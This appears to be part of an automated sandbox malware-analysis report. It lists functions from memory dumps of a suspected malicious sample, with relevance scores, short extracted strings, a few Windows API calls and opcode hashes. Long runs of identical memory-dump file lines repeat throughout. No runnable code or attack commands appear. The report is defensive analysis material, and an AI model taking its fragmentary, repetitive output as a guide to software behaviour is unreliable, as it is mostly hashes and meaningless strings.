Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptString
String ID:
API String ID: 80407269-0
Opcode ID: f295be6167c6aa2ddad929f34612efa6ac73c827f69b7a578ce4b54db13ccd20
Instruction ID: 435e05716119e9302b44a18fb252e8e54d80e73f164d59b7a9bb955f22a83da2
Opcode Fuzzy Hash: f295be6167c6aa2ddad929f34612efa6ac73c827f69b7a578ce4b54db13ccd20
Instruction Fuzzy Hash: EB111FB0200204BFDB00DFA4D884FBB33AAAF89304F509949FA158B250DB39EC81DB65

Function 00841F96 Relevance: 5.4, Strings: 3, Instructions: 1652COMMON

Download Yara Rule

Strings

#0x, xrefs: 00842520
D>m[, xrefs: 008430E1
rJ~, xrefs: 008432FD

Memory Dump Source

Source File: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID:
String ID: #0x$D>m[$rJ~
API String ID: 0-2289065162
Opcode ID: 3bb2da8c1ef470592cf2de676a1982ddb0ee011f63bb8fd2f088ff8faec52bc9
Instruction ID: d0630a2f1ab273ca8b00bcac4677cb69862e6a27dc4e02d62cc55a795525b399
Opcode Fuzzy Hash: 3bb2da8c1ef470592cf2de676a1982ddb0ee011f63bb8fd2f088ff8faec52bc9
Instruction Fuzzy Hash: 18B238F360C2049FE304AE2DEC8567ABBE9EFD4720F16863DE6C5C3744EA3558058696

Function 00839990 Relevance: 5.3, Strings: 3, Instructions: 1578COMMON

Download Yara Rule

Strings

5}, xrefs: 0083A68B
,:}, xrefs: 00839B91
\paM, xrefs: 0083A1F0

Memory Dump Source

Source File: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 5}$\paM$,:}
API String ID: 0-1951460074
Opcode ID: ea83969e9d6f02c3fb1c7109c88f357a158a9d31385156a4678fa3ec9df72e62
Instruction ID: 3e5c75a9e5d57f39b6f2ff0511aa32cccd55361b1d2c20b9b22349c25d90a952
Opcode Fuzzy Hash: ea83969e9d6f02c3fb1c7109c88f357a158a9d31385156a4678fa3ec9df72e62
Instruction Fuzzy Hash: 7EB203F3A0C2109FE3046E2DEC8567ABBE9EF94720F1A493DEAC4D3744E63558058697

Function 6C626CF0 Relevance: 4.7, APIs: 3, Instructions: 231COMMON

Download Yara Rule

APIs

InitializeConditionVariable.KERNEL32(?), ref: 6C626D45
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C626E1E

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: ConditionExclusiveInitializeLockReleaseVariable
String ID:
API String ID: 4169067295-0
Opcode ID: 2e0874f305625bfa2f0fdf329f50de68b40cda5ed8b48e834f4e77c284da0ec3
Instruction ID: 5c7098eee7a4099e20d8ecb92458615ea6295355eeba1baf79bb790cb07d0b25
Opcode Fuzzy Hash: 2e0874f305625bfa2f0fdf329f50de68b40cda5ed8b48e834f4e77c284da0ec3
Instruction Fuzzy Hash: BAA16D706183858FDB25CF25C4847AABBE2BF89308F04495DE88A87751DB74E849CF96

Function 00483720 Relevance: 4.6, APIs: 3, Instructions: 100comCOMMON

Download Yara Rule

APIs

CoCreateInstance.COMBASE(0048E118,00000000,00000001,0048E108,00000000), ref: 00483758
MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 004837B0

Memory Dump Source

Source File: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID: ByteCharCreateInstanceMultiWide
String ID:
API String ID: 123533781-0
Opcode ID: a730e269f0538d2a576d007567367cbefb533ea0c56770e044f7f80ca402b27d
Instruction ID: 5d1de4879c794ef8d804a5cdc3c80e602324faf45b7f02459bf134f82901a0a5
Opcode Fuzzy Hash: a730e269f0538d2a576d007567367cbefb533ea0c56770e044f7f80ca402b27d
Instruction Fuzzy Hash: 4C410770A00A289FDB24EF58CC94B9BB7B5BB48706F4055D9E608A7290D7716EC5CF50

Function 0083B3FD Relevance: 4.1, Strings: 2, Instructions: 1583COMMON

Download Yara Rule

Strings

'a??, xrefs: 0083BD66
q}{[, xrefs: 0083B5A2

Memory Dump Source

Source File: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 'a??$q}{[
API String ID: 0-1011263069
Opcode ID: cb58b33b8433624d41dcb592ebf8b5201e0578d8ae5d76a4caae597eeb6d621c
Instruction ID: 2cc90c5f888e90bc52c006905f871fd90f3b2005dbc07abca02f502adf09daa1
Opcode Fuzzy Hash: cb58b33b8433624d41dcb592ebf8b5201e0578d8ae5d76a4caae597eeb6d621c
Instruction Fuzzy Hash: BDB2F2F3A08204AFE314AE29DC8577AFBE5EF94720F16493DEAC4C3744EA3558058697

Function 6C6485F0 Relevance: 3.6, APIs: 2, Instructions: 619COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 6C648C7C
__aulldiv.LIBCMT ref: 6C648DD7

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction ID: 313bf2b209e41f38d008ff90c8c8cb1815c8de04ff258b07aa84fe9c21ab4585
Opcode Fuzzy Hash: db5f37eeb5151a0c79d842b80d44bf315513e08190c289969ce06011ea5de0b8
Instruction Fuzzy Hash: 33326C31F012198BDF18CE9CC8A17AEB7B2FB88304F15C52AD506FB7A0DA349D458B95

Function 0084552C Relevance: 2.9, Strings: 1, Instructions: 1638COMMON

Download Yara Rule

Strings

_rov, xrefs: 0084651B

Memory Dump Source

Source File: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID:
String ID: _rov
API String ID: 0-3193757623
Opcode ID: 960b6bb8e580839b629def5d739fbfa44858680b307c2d3f965cf5c91325c8bd
Instruction ID: 4bd1580f27eab3683950e0e8942bf41fe7ebbe8edceb6766d5562e6c6e6954af
Opcode Fuzzy Hash: 960b6bb8e580839b629def5d739fbfa44858680b307c2d3f965cf5c91325c8bd
Instruction Fuzzy Hash: F7B22AF360C2049FD3046E2DEC8567ABBE9EBD4360F1A8A3DE6C4C3744EA3558058697

Function 00711127 Relevance: 2.7, Strings: 2, Instructions: 191COMMON

Download Yara Rule

Strings

c]+, xrefs: 007111E6
JU=_, xrefs: 00711340

Memory Dump Source

Source File: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID:
String ID: JU=_$c]+
API String ID: 0-4117295931
Opcode ID: 7411ab741d11990808ca624acfaa7e7791d6ad33b41d227c2b81dfae2123a992
Instruction ID: d5d736185e16b3a745e630a79b78eabb848e87e882420762c1ab45c5126b165a
Opcode Fuzzy Hash: 7411ab741d11990808ca624acfaa7e7791d6ad33b41d227c2b81dfae2123a992
Instruction Fuzzy Hash: 6D51E4B26087048FE3046E29EC8537EF7E5EFD4720F16493DE6D583390EA7994458B42

Function 6C625C10 Relevance: 1.6, APIs: 1, Instructions: 333COMMON

Download Yara Rule

APIs

memcmp.VCRUNTIME140(?,?,6C5F4A63,?,?), ref: 6C625F06

Memory Dump Source

Source File: 00000000.00000002.1924608989.000000006C5E1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5E0000, based on PE: true

Associated: 00000000.00000002.1924589869.000000006C5E0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924664743.000000006C65D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924692491.000000006C66E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1924756569.000000006C672000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5e0000_file.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 7fa3ea868e217c3f2f721e9819ba9d0996250093c90481f5aa1fd94503293eef
Instruction ID: 5f7d7171a9a1d7a18ada5b4e8fe49e8fa8fb3ce2204a0b20a33d07e293a44a4d
Opcode Fuzzy Hash: 7fa3ea868e217c3f2f721e9819ba9d0996250093c90481f5aa1fd94503293eef
Instruction Fuzzy Hash: 3CC1D375E012098BCB24CF65C5906EEBBF2FF8A318F28815DD8556BB48D735A806CF94

Function 006FF392 Relevance: 1.5, Strings: 1, Instructions: 210COMMON

Download Yara Rule

Strings

Dw{, xrefs: 006FF571

Memory Dump Source

Source File: 00000000.00000002.1901129826.00000000006CE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true

Associated: 00000000.00000002.1900514039.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000471000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004CA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000004FF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000502000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000055F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000057F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000058E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000615000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.0000000000635000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.000000000063B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1900547335.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000933000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000095E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901129826.000000000096D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901556274.000000000096E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901709954.0000000000B0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1901731170.0000000000B0C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_470000_file.jbxd

Yara matches

Similarity

API ID:
String ID: Dw{
API String ID: 0-1363940027
Opcode ID: 4052e2a6cdf5535aec2f1d95c4e93388865ab90a9be7ff41a0389a820f481a4e
